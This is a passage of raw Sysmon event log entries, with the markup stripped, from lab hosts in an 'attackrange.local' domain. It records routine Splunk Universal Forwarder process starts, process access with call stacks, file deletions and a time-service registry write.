Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.949{466BC892-F5C2-60EB-5E7D-00000000CF01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.533{466BC892-F5C2-60EB-5D7D-00000000CF01}95322660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.286{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:50.265{466BC892-F5C2-60EB-5D7D-00000000CF01}9532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808403Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:51.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DACBB4C2952019B753796B999BE396CA,SHA256=366AE49A23B8B8A6EB0E0A2F2FDB67C44D21F60260100D9369D40873338BF602,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.663{466BC892-F5C3-60EB-5F7D-00000000CF01}49569228C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.463{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.449{466BC892-F5C3-60EB-5F7D-00000000CF01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.283{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6FF0F6EA5396604E86557A3C273834A,SHA256=959065E72C86E272C7DD0D3AFAEABAE960750208888BBC33957F6C0E11CD7280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:51.001{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16095B8A3B7AE80A36B5F88858AC3D0D,SHA256=EAAEE4C06C956269A1063D48B3B3C397D86960C4509209838B692D5161DD43C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808404Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:52.505{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06177829C740D14B30F40C7A549DAC45,SHA256=17ADDD1774E3958EEC5E1902EA1502E77F811A0AA624A77A24D981FBF697AD4A,IMPHASH=00000000000000000000000000000000falsetrue 
13241300x80000000000000001050526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:56:52.978{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f3-0x7a2fa31c) 10341000x80000000000000001050525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.831{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.831{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:52.831{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.816{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:52.816{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.816{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C4-60EB-617D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:52.816{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 